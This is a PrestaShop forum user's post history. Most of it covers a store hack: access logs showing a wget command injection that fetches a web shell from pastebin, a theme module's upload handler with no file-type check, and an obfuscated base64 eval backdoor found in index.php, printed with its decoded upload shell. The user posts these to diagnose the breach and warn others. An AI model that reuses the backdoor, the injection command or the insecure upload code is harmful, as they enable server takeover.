Jump to content

irder

Members
  • Posts

    341
  • Joined

  • Last visited

Posts posted by irder

  1. 10 hours ago, SHEINLINE said:

    prestashop1.7  的paypal module,你paypal是用哪个版本的?  能发一个给我吗?

    我的程序是1.7.6.2,官方上的payapl module版本是5.1.2, 必须得用paypal的business 账户才可以用。

    永远不要用paypal , 会莫名的把你账号和别人的关联,封掉

  2. 1 minute ago, razaro said:

    Yeah  and looks it start from  /modules/bamegamenu/ajax_phpcode.php also.

    Similar hack like 3 years ago

    that target upload forms.

     

    Check this topic for advises.

    yes, it's from 

    217.61.98.64 - - [12/Sep/2019:04:14:24 +0000] "POST /modules/verticalmegamenus/VerticalMegaMenusUploadImage.php HTTP/1.1" 200 7

    217.61.98.64 - - [12/Sep/2019:04:14:25 +0000] "GET /modules/verticalmegamenus/images/temps/spy.php HTTP/1.1" 200 3297

    i installed this module  verticalmegamenus and the first new folder was temps

  3. 36 minutes ago, NemoPS said:

    well yeah, that's a hack. What happens if you replace the content? Are you using any module that allows uploads? I would check those folders first.

    here are some access logs 

    maybe the web shell file was uploaded from the last few lines

     

    216.244.66.229 - - [12/Sep/2019:03:57:49 +0000] "GET /item/1167/chinese-letter-print-restaurant-waitress-jacket-waiter-uniform.html HTTP/1.1" 301 -
    217.61.98.64 - - [12/Sep/2019:04:09:40 +0000] "GET /modules/bamegamenu/ajax_phpcode.php?code=system(%22wget%20-O%20../../spy.php%20pastebin.com/raw/USuPKwXE%22); HTTP/1.1" 404 78785
    217.61.98.64 - - [12/Sep/2019:04:09:44 +0000] "GET /spy.php HTTP/1.1" 404 78683
    217.61.98.64 - - [12/Sep/2019:04:09:46 +0000] "GET /modules/bamegamenu/ajax_phpcode.php?code=system(%22wget%20-O%20../../spy.php%20pastebin.com/raw/USuPKwXE%22); HTTP/1.1" 404 78785
    217.61.98.64 - - [12/Sep/2019:04:09:47 +0000] "GET /spy.php HTTP/1.1" 404 78683
    217.61.98.64 - - [12/Sep/2019:04:13:46 +0000] "GET /modules/bamegamenu/ajax_phpcode.php?code=system(%22wget%20-O%20../../spy.php%20pastebin.com/raw/USuPKwXE%22); HTTP/1.1" 404 78785
    217.61.98.64 - - [12/Sep/2019:04:13:46 +0000] "GET /spy.php HTTP/1.1" 404 78683
    217.61.98.64 - - [12/Sep/2019:04:13:49 +0000] "POST /modules/smartprestashopthemeadmin/ajax_smartprestashopthemeadmin.php HTTP/1.1" 404 78744
    217.61.98.64 - - [12/Sep/2019:04:14:22 +0000] "POST /modules/jmsslider/ajax_jmsslider.php?action=addLayer&id_slide=attari&data_type=image HTTP/1.1" 404 78768
    217.61.98.64 - - [12/Sep/2019:04:14:23 +0000] "GET /modules/jmsslider/views/img/layers/spy.php HTTP/1.1" 404 78718
    217.61.98.64 - - [12/Sep/2019:04:14:24 +0000] "POST /modules/groupcategory/GroupCategoryUploadImage.php HTTP/1.1" 200 36
    217.61.98.64 - - [12/Sep/2019:04:14:24 +0000] "POST /modules/verticalmegamenus/VerticalMegaMenusUploadImage.php HTTP/1.1" 200 7
    217.61.98.64 - - [12/Sep/2019:04:14:25 +0000] "GET /modules/verticalmegamenus/images/temps/spy.php HTTP/1.1" 200 3297
    217.61.98.64 - - [12/Sep/2019:04:14:25 +0000] "GET /modules/bamegamenu/ajax_phpcode.php?code=system(%22wget%20-O%20../../spy.php%20pastebin.com/raw/USuPKwXE%22); HTTP/1.1" 404 78785
    217.61.98.64 - - [12/Sep/2019:04:14:26 +0000] "GET /spy.php HTTP/1.1" 404 78683
    217.61.98.64 - - [12/Sep/2019:04:14:27 +0000] "POST /modules/smartprestashopthemeadmin/ajax_smartprestashopthemeadmin.php HTTP/1.1" 404 78744
    217.61.98.64 - - [12/Sep/2019:04:15:02 +0000] "POST /modules/jmsslider/ajax_jmsslider.php?action=addLayer&id_slide=attari&data_type=image HTTP/1.1" 404 78768
    217.61.98.64 - - [12/Sep/2019:04:15:03 +0000] "GET /modules/jmsslider/views/img/layers/spy.php HTTP/1.1" 404 78718
    217.61.98.64 - - [12/Sep/2019:04:15:04 +0000] "POST /modules/groupcategory/GroupCategoryUploadImage.php HTTP/1.1" 200 36
    217.61.98.64 - - [12/Sep/2019:04:15:04 +0000] "POST /modules/verticalmegamenus/VerticalMegaMenusUploadImage.php HTTP/1.1" 200 7
    217.61.98.64 - - [12/Sep/2019:04:15:05 +0000] "GET /modules/verticalmegamenus/images/temps/spy.php HTTP/1.1" 200 3302
    216.244.66.197 - - [12/Sep/2019:04:15:22 +0000] "GET /robots.txt HTTP/1.1" 200 2620

     

  4.  

     

    it's very possible the web shell file was upload from some modules of supershop theme,

    i also installed kuteshop theme,

    unlucky, the hacker deleted all my website files,

     

    nearly we can make sure the back door file php file to get web shell was upload from

     \modules\verticalmegamenus\VerticalMegaMenusUploadImage.php

    the code with Serious security problem

    it doesn't verify the file types and audit the permission at all,

    i bought this theme,but it ruin my store !

     

    <?php
    require_once(dirname(__FILE__).'../../../config/config.inc.php');
    require_once(dirname(__FILE__).'../../../init.php');
    require_once(dirname(__FILE__).'/verticalmegamenus.php');
    $tempPath = _PS_MODULE_DIR_.'verticalmegamenus/images/temps/';
    $fileName = $_FILES["uploadimage"]["name"];
    $pathFile = $tempPath.$fileName;
    if(($_FILES["uploadimage"]["size"] > 1000000)){
    	echo "File size is greater than 1MB";
    }else{
    	if (@move_uploaded_file($_FILES['uploadimage']['tmp_name'], $pathFile)) {		
    	  	echo $fileName; 
    	}else {
    		echo "File upload failed.";
    	}	
    }
    ?>

     

     

     

    one the web shell back door file,

    the index.php was modified with these code at the begin of the file

    <?php if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){
        $func="cr"."ea"."te_"."fun"."ction";
        $x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");
        $x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVzWyJuYW1lIl0gIT0gJycpIHsKICAgICRmdWxscGF0aCA9ICRfUkVRVUVTVFsicGF0aCJdIC4gJGZpbGVzWyJuYW1lIl07CiAgICBpZiAobW92ZV91cGxvYWRlZF9maWxlKCRmaWxlc1sndG1wX25hbWUnXSwgJGZ1bGxwYXRoKSkgewogICAgICAgIGVjaG8gIjxoMT48YSBocmVmPSckZnVsbHBhdGgnPkRvbmUhIE9wZW48L2E+PC9oMT4iOwogICAgfQp9ZWNobyAnPGh0bWw+PGhlYWQ+PHRpdGxlPlVwbG9hZCBmaWxlcy4uLjwvdGl0bGU+PC9oZWFkPjxib2R5Pjxmb3JtIG1ldGhvZD1QT1NUIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIGFjdGlvbj0iIj48aW5wdXQgdHlwZT10ZXh0IG5hbWU9cGF0aD48aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZXMiPjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iVVBsb2FkIj48L2Zvcm0+PC9ib2R5PjwvaHRtbD4nOwo/Pg==");
        exit;}?><?php

    after decode

    <?php
    
    $files = @$_FILES["files"];
    if ($files["name"] != '') {
        $fullpath = $_REQUEST["path"] . $files["name"];
        if (move_uploaded_file($files['tmp_name'], $fullpath)) {
            echo "<h1><a href='$fullpath'>Done! Open</a></h1>";
        }
    }echo '<html><head><title>Upload files...</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="UPload"></form></body></html>';
    ?>

     

  5. [ERROR] PHP 1.7.0.0 /* PHP:ps1700_stores(); */

     

    SQL 1.7.0.0 1267 in /* Save the new IDs */ UPDATE `ps_tab_transit` tt SET `id_new_tab` = ( SELECT `id_tab` FROM `ps_tab` WHERE CONCAT(`class_name`, COALESCE(`module`, '')) = tt.`key` ): Illegal mix of collations (utf8_unicode_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation '='

×
×
  • Create New...

Important Information

Cookies ensure the smooth running of our services. Using these, you accept the use of cookies. Learn More